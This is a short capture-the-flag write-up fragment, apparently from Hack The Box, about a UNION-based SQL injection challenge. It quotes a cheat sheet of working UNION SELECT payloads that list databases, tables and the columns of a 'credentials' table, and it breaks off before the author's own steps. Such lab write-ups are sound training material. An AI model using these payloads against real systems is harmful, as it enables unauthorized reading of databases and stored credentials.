Unholy Union
A challenge about SLQi that uses Union injection technique. What is convenient about this challenge is it shows the query that is used to pull the data from the database. I used these SQL injection cheat sheet that is from the SQLi fundamental module from the HTB academy: cn' UNION select 1,database(),2,3-- - Current database name cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- - List all databases cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- - List all tables in a specific database cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- - List all columns in a specific table Steps I took based on the cheat sheet from the HTB Academy: ...